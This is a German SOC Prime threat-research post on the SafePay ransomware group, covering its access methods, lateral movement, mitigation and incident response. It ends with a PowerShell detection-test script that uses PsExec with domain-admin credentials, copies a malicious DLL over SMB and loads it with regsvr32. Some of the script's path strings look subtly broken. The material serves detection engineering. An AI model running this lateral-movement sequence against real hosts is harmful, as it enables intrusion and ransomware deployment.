SOC Prime Bias: Hoch

14 Jan 2026 16:49 UTC

Hinter SafePay: Analyse der neuen zentralisierten Ransomware-Gruppe

Author Photo
Ruslan Mikhalov Chief of Threat Research at SOC Prime linkedin icon Folgen
Hinter SafePay: Analyse der neuen zentralisierten Ransomware-Gruppe
shield icon

Detection stack

  • AIDR
  • Alert
  • ETL
  • Query

Übersicht

SafePay ist eine kürzlich aufgetauchte Ransomware-Operation, die eher als straff geführte, zentralisierte Gruppe agiert, anstatt als typisches Ransomware-as-a-Service-Ökosystem. Die Täter folgen einem Doppel-Erpressungsschema, indem sie sensible Daten vor der Verschlüsselung organisieren und mit der Veröffentlichung über eine leak-Seite auf Tor drohen. Die Zustellung erfolgt häufig über eine native Windows-DLL, wobei die Ausführung und Verbreitung durch weit verbreitete Living-off-the-Land-Dienstprogramme unterstützt wird. In beobachteten Fällen ist der gesamte Zeitrahmen aggressiv, wobei der anfängliche Zugriff häufig in einer 24-Stunden-Frist durch eine Umgebungsweite Verschlüsselung komprimiert wird.

Untersuchung

Forscher berichten, dass SafePay oft Zutritt durch exponierte VPN- oder RDP-Konten erhält, indem gestohlene oder erratene Anmeldedaten verwendet werden, und in einigen Szenarien fehlerhafte FortiGate-Implementierungen ausnutzt – insbesondere Umgebungen ohne MFA. Zur Aufrechterhaltung wurden Betreiber beobachtet, die Hintertüren wie QDoor einsetzen und legitime Fernverwaltungswerkzeuge, einschließlich ScreenConnect, verwenden, um sich in normalen IT-Aktivitäten zu verbergen. Die seitliche Bewegung erfolgt typischerweise durch PsExec und WinRM, während die Entdeckung von Hosts und Freigaben durch ein maßgeschneidertes PowerShell-Dienstprogramm (ShareFinder.ps1) unterstützt wird. Vor der Verschlüsselung führt die Nutzlast „Vor-Ransom“-Aktionen aus, um die Auswirkungen zu maximieren und die Wiederherstellung zu behindern: Sie entfernt Schattenkopien, ändert Boot-Konfigurationseinstellungen und beendet eine hartcodierte Reihe von sicherheitsbezogenen Prozessen und Diensten.

Minderung

Erfordern Sie MFA für alle Remote-Zugangswege und reduzieren Sie das Firewall-Risiko, indem Sie die lokale Kontoauthentifizierung einschränken und die Verwaltungsexposition straffen. Überwachen Sie die anomale Verwendung von PsExec, WinRM, regsvr32 und rundll32 – besonders in Sequenzen, die mit Remote-Ausführung und -Organisation übereinstimmen. Stimmen Sie Endpunkterkennungen ab, um die Beendigung gängiger Sicherheitswerkzeuge, das Löschen von Schattenkopien und Veränderungen der BCD-/Boot-Einstellungen zu erkennen. Reduzieren Sie Ausführungsmöglichkeiten, indem Sie das Laden unsignierter DLLs blockieren oder streng kontrollieren und Anwendungssteuerungsrichtlinien auf Endpunkten und Servern durchsetzen.

Antwort

Wenn SafePay-Indikatoren identifiziert werden, isolieren Sie betroffene Systeme sofort, erfassen Sie flüchtigen Speicher und bewahren Sie relevante Authentifizierungs-, Endpunkt- und Netzwerklprotokolle auf. Identifizieren und blockieren Sie Infrastruktur für Kommando und Kontrolle und beenden Sie bösartige Prozesse und entfernen Sie Persistenzmechanismen. Versuchen Sie Wiederherstellungsaktionen wie die Wiederherstellung von Schattenkopien, wo möglich, aber setzen Sie Datenklau voraus und validieren Sie den Umfang der Exfiltration. Führen Sie eine vollständige forensische Untersuchung durch, um betroffene Daten zu bestimmen und führen Sie Stakeholder-Benachrichtigungen sowie Eskalationsschritte durch, die zu Verfahren zur Doppel-Erpressungsreaktion passen.

Angriffsablauf

Simulation Ausführung

Voraussetzung: Die Telemetriekontrolle und Baseline-Vorbereitungsprüfung muss bestanden sein.

Begründung: Dieser Abschnitt beschreibt die genaue Ausführung der Gegnermethode (TTP), die darauf abzielt, die Erkennungsregel auszulösen. Die Befehle und Erzählungen MÜSSEN die identifizierten TTPs direkt widerspiegeln und darauf abzielen, die genaue Telemetrie zu erzeugen, die von der Erkennungslogik erwartet wird.

  • Angriffserzählung & Befehle:
    Ein Angreifer mit Domain-Administrator-Anmeldeinformationen kompromittiert eine Pivot-Maschine und verwendet PsExec um eine remote cmd.exe auf einem sekundären Host (TARGET_IP). Unmittelbar nach dem Aufbau der Remote-Shell überträgt der Angreifer eine bösartige DLL (malicious.dll) zum Remote-Host und lädt sie mit regsvr32.exe (alternativ rundll32.exe) um die Ransomware-Nutzlast auszuführen. Die Sequenz erzeugt zwei unterschiedliche Prozess-Erstellungsereignisse, die die Sigma-Regel erfüllen: einen PsExec-Prozess mit der genauen Befehlszeile und einen anschließenden DLL-Loader-Prozess.

  • Regression Test Script:

    # -------------------------------------------------------------------------
    # SafePay Ransomware-Simulation – PsExec + Regsvr32
    # -------------------------------------------------------------------------
    # Voraussetzungen:
    #   - PsExec.exe im aktuellen Verzeichnis oder im PATH
    #   - Eine bösartige DLL namens malicious.dll im gleichen Ordner platziert
    #   - Gültige Domain-Admin-Anmeldeinformationen (Platzhalter ersetzen)
    # -------------------------------------------------------------------------
    
    $targetIP   = "10.0.0.20"            # <--- ÄNDERN ZU IHREM ZIEL
    $username   = "DomainAdmin"        # <--- ÄNDERN ZU GÜLTIGEM BENUTZER
    $password   = "Password123!"        # <--- ÄNDERN ZU GÜLTIGEM PASSWORT
    $dllPath    = "$PSScriptRootmalicious.dll"
    
    # 1) Führen Sie remote cmd.exe über PsExec aus
    Write-Host "[*] Starten von remote cmd.exe über PsExec..."
    $psexecArgs = "$targetIP -u $username -p $password cmd.exe"
    & .PsExec.exe $psexecArgs
    
    Start-Sleep -Seconds 5  # geben Sie der Remote-Sitzung Zeit zum Starten
    
    # 2) Kopieren Sie die bösartige DLL zum Remote-Host (über SMB)
    Write-Host "[*] Kopieren der bösartigen DLL zum Remote-Host..."
    $destPath = "$targetIPC$Tempmalicious.dll"
    Copy-Item -Path $dllPath -Destination $destPath -Force
    
    # 3) Laden Sie die DLL über regsvr32 (dies erzeugt das zweite Ereignis)
    Write-Host "[*] Laden der bösartigen DLL mit regsvr32..."
    $regsvrArgs = "/s $destPath"
    & regsvr32.exe $regsvrArgs
    
    Write-Host "[+] Simulation abgeschlossen. Überprüfen Sie SIEM auf Alarme."
  • Bereinigung Befehle:

    # -------------------------------------------------------------------------
    # Bereinigung für SafePay-Simulation
    # -------------------------------------------------------------------------
    $targetIP = "10.0.0.20"
    $dllRemote = "$targetIPC$Tempmalicious.dll"
    
    # Entfernen Sie die bösartige DLL vom Remote-Host
    Write-Host "[*] Entfernen der bösartigen DLL vom Remote-Host..."
    Remove-Item -Path $dllRemote -Force -ErrorAction SilentlyContinue
    
    # Optional beenden Sie alle verbleibenden regsvr32/rundll32-Prozesse
    Get-Process -Name regsvr32, rundll32 -ErrorAction SilentlyContinue |
        Where-Object {$_.Path -like "*$targetIP*"} |
        Stop-Process -Force
    
    Write-Host "[+] Bereinigung abgeschlossen."